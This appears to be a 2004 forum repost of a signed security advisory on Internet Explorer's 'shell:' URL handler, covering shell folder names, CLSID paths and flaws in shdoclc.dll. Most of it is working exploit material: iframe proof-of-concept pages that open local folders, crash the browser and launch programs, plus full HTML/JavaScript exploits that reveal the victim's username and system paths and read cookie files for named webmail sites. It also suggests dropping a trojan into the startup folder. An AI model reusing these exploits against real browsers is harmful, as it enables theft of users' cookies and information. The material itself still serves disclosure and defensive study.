|
-
March 16th, 2004, 10:29 PM
#1
shell url handler security issues
This is a copy of the document i sent to securityfocus.com two days ago hope you enjoy it.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Internet explorer shell url handler :
shell url handler security issues
1)shell url handler vulnerability:
there exists a security issue with the way internet explorer
operates
urls containing the shell: url handler this can be used to extract
information from victims system which can be done by crafting html
pages that contain the shell url as src or href values,this
vulnerability allows access to certain shell folders for instance :
shell:(shell folder name) ------>the urls generaly look like this
you can find the shell folder names by searching the registry for
"shellfolder"
shell:windows
shell:cookies
shell:recent
shell:system
shell:Common AppData
shell:Common Desktop
shell:Common Documents
shell:Common Favorites
shell:Common Programs
shell:Common Start Menu
shell:Common Startup
shell:Common Templates
shell:Common Administrative Tools
shell:CommonVideo
shell:CommonPictures
shell:Personal
shell:local appdata
shell:profile
shell:Administrative Tools
.......
proof of concept:
- - - - - -
- - - - -
- - - -
- - -
- -
- ---------------------------------------------------------------------------
<iframe id="Target" src='shell:windows' name="x" width="875"
height="527">
</iframe>
- - - - - -
- - - - -
- - - -
- - -
- -
- ---------------------------------------------------------------------------
this vulnerability alone is not that much harmful for the execution
of only limited files is possible (mainly those that ie normally can
open: *.bmp,*.txt,*.log.*.jpeg,html,...)
it is however possible to change folders or use these shell folders
to get access to other folders on users system :
proof of concept:
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
<iframe id="Target" src='shell:windows\system32\config\' name="x"
width="875" height="527">
</iframe>
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
this gives exploits that can write to users system the ability to
create files in exact locations on user 's system.For instance
saving
a trojan horse in the common startup folder which would insure the
start of this program anytime any of the users logon.
2)clsids and shell url handler vulnerability:
shell folders that ie has access to cannot only be accessed using
their shell folder names but also by using clsids pointing to those
folders:
shell:::(clsid)
clsids can be found here:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
[folders]
fonts shell:::{D20EA4E1-3957-11d2-A40B-0C5020524152}
tasks shell:::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
my computer shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
downloaded files shell:::{88C6C381-2E85-11D0-94DE-444553540000}
search shell:::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}
{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
IE(homepage) shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
recycle bin shell:::{645FF040-5081-101B-9F08-00AA002F954E}
network shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D}
control panel shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}
printers shell:::{2227A280-3AEA-1069-A2DE-08002B30309D}
web folders shell:::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
connection shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48}
my documents shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}
administrative tools shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153}
briefcase shell:::{85BBD920-42A0-1069-A2E4-08002B30309D}
scanners and cameras shell:::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
cabnet shell:::{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}
startup shell:::{48e7caab-b918-4e58-a94d-505519c795dc}
common startup shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1}
programs folder shell:::{7be9d83c-a729-4d97-b5a7-1b7313c39e0a}
acvtivex folder shell:::{88C6C381-2E85-11D0-94DE-444553540000}
.........
Note: shell linking when combined with clsids on a local machine can
give users the ability to bypass some restrictions:
start>run>shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}<press
enter>
- - - - - - -->the folder options popsup
proof of concept:
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
<iframe id="Target"
src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x"
width="875" height="527">
</iframe>
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
changing directories or folders is also possible in this
vulnerability.
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\a:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\d:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\e:
proof of concept:
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x"
width="875" height="527">
</iframe>
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
it is also possible to change between shell folders using "::\clsid"
:
proof of concept:
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}
\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}'
name="x" width="875" height="527">
</iframe>
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
If internet explorer is forced to open the " shell storage folder
viewer " using this method it would cause internet explorer to crash
which would close all open windows :
proof of concept:
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
<iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'
name="x" width="875" height="527">
</iframe>
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
programs like "Net meeting" can somehow be run using this method:
proof of concept:
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
click
- - - - - -
- - - - -
- - - -
- - -
- -
- -------------------------------------------------------------------------------------------
*it is also possible to start msn messenger but the fact that other
programs can be run or not
has not been tested.
3)\shdoclc.dll\ vulnerability:
when known files on user 's system is accessed using (shell:(shell
folder name) or shell:::(clsid))
internet explorer dose not open the file according to its filetype
but reacts towards it as if it has been asked to download that file
from the location this is correct as far as ie itself cannot open
that file (*.gif,*.bmp,*.txt,... for instance *.txt is opened using
notepad). When this happens the page that has tried to open the file
causes an error which res://C:\WINHOLEZ\System32\shdoclc.dll\
responds to, the url of the page generated by shdoclc.dll contains
the location of that file which can reveal important information.
proof of concept:
IE 6
IE 6+sp1
- - - - - -
- - - - -
- - - -
- - -
- -
- ---------------------------------------------------------------------------------------------
<html>
<head>
</head>
<body onload=setTimeout("exploit()",4*100);>
<iframe id="Target" width="0" height="0"
src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
function exploit(){
loc=new String(Target.location);
var len=loc.length
var n=loc.indexOf("Settings")+9;
var m=loc.indexOf("System32");
preuser=new String(loc.substring(n,len));
p=preuser.indexOf("\\");
user=new String(preuser.substring(0,p));
winloc=new String(loc.substring(6,m));
q=winloc.indexOf("\\");
rootdrive=new String(winloc.substring(0,q+1));
targetwin=window.open("");
targetwin.document.write("Username : "+user+"
");
targetwin.document.write("root drive : "+rootdrive+"
")
targetwin.document.write("location of windows folder :
"+winloc+"
")
targetwin.document.write("location of user profile
:"+rootdrive+"Documents and Settings\\"+user+"\\");
targetwin.document.write("
Wallpaper :
<img
border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local
Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30%
height=30%>")
targetwin.document.write("
internet explorer wallpaper
:
<img border=0 src='"+rootdrive+"Documents and
Settings\\"+user+"\\Application Data\\Microsoft\\Internet
Explorer\\Internet Explorer Wallpaper.bmp' width=30%
height=30%>
")
}
</SCRIPT>
</body>
</html>
- - - - - -
- - - - -
- - - -
- - -
- -
- ---------------------------------------------------------------------------------------------
proof of concept:
(reading cookies )
IE 6 only
*on IE6+sp1 the exploit won't work because cookies folder cannot be
accessed,this is due to the fact that cookies folder is set to be
part of restricted sites for which security level is high and the
script won't be affective.
- - - - - -
- - - - -
- - - -
- - -
- -
- ---------------------------------------------------------------------------------------------
<html>
<head>
</head>
<body onload=setTimeout("exploit()",4*100);>
<iframe id="Target" width="0" height="0"
src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
function exploit(){
loc=new String(Target.location);
var len=loc.length
var n=loc.indexOf("Settings")+9;
var m=loc.indexOf("System32");
preuser=new String(loc.substring(n,len));
p=preuser.indexOf("\\");
user=new String(preuser.substring(0,p));
winloc=new String(loc.substring(6,m));
q=winloc.indexOf("\\");
rootdrive=new String(winloc.substring(0,q+1));
targetwin=window.open("");
targetwin.document.write("Username : "+user+"
");
targetwin.document.write("root drive : "+rootdrive+"
")
targetwin.document.write("location of windows folder :
"+winloc+"
")
targetwin.document.write("location of user profile
:"+rootdrive+"Documents and Settings\\"+user+"\\");
targetwin.document.write("
Wallpaper :
<img
border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local
Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30%
height=30%>")
targetwin.document.write("
internet explorer wallpaper
:
<img border=0 src='"+rootdrive+"Documents and
Settings\\"+user+"\\Application Data\\Microsoft\\Internet
Explorer\\Internet Explorer Wallpaper.bmp' width=30%
height=30%>
")
var k=0;
Targeturln=new Array("");
Targeturl=new Array("");
Targeturln[0]="yahoo"
Targeturln[1]="hotmail"
Targeturln[2]="antionline"
do{
Targeturl=Targeturln[k];
contentx=new Array(x(Targeturl));
if(contentx!="") {
targetwin.document.write("
<font size=5>Contents of the
cookie file(s) related to
"+Targeturl+"</font>
<font>"+contentx+"</font>
");
}
if(contentx==""){
targetwin.document.write("
<font size=5>No files found
related to "+Targeturl+"</font>
");
}
k++;
}while(k<3);
return false;
}
function x(url){
content=new Array("");
var i=0;
do{
cookie=window.open("shell:profile\\Local
Settings\\Temp\\cookies\\"+user+"@"+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"
"+user+"@"+url+"["+i+"].txt
:"+"
"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
i=0;
do{
cookie=window.open("shell:profile\\Local
Settings\\Temp\\cookies\\"+user+"@www"+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"
"+user+"@www."+url+"["+i+"].txt
:"+"
"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
return content;
}
</SCRIPT>
</body>
</html>
- - - - - -
- - - - -
- - - -
- - -
- -
- ---------------------------------------------------------------------------------------------
author:Roozbeh afrasiabi
roozbeh_afrasiabi@yahoo.com
da_stone_cold_killer@yahoo.com
all rights reserved
Any changes to this document must be done under permission of the
author,you can store or use this information as far as it has not
been changed.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.96rc1
iQD1AwUBQFdbIaPgVnQvvTzcAQIGywcAkoDq/q7rURJNAE8KJxu5zlsYHM+3JyM3
rBDycy3Ik5vEzBJk6AWOkly02Xue2HU8Yys4V2B9ogi/c2xUOJ3vUj08zG86QReB
aaGkJrV0UnOVHiTkVN42OQzTXPsEasSpdtJke9LufCMgEo9O2zjc5nB+nDSgaoNF
BYs6hbyQhz/y3wk9O58LedDoBm5YTYOoqGyEyt3Kf8mfptUrXr2cUUqYl+dVxjxV
kAIoR8U/DqoYZStYB8lH2J8PV5mtJWxIKpK4tJmW/jwrhSyvTR5Jv1hKKfKiVPJV
RmF1gjRoCxc=
=NaV3
-----END PGP SIGNATURE-----
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote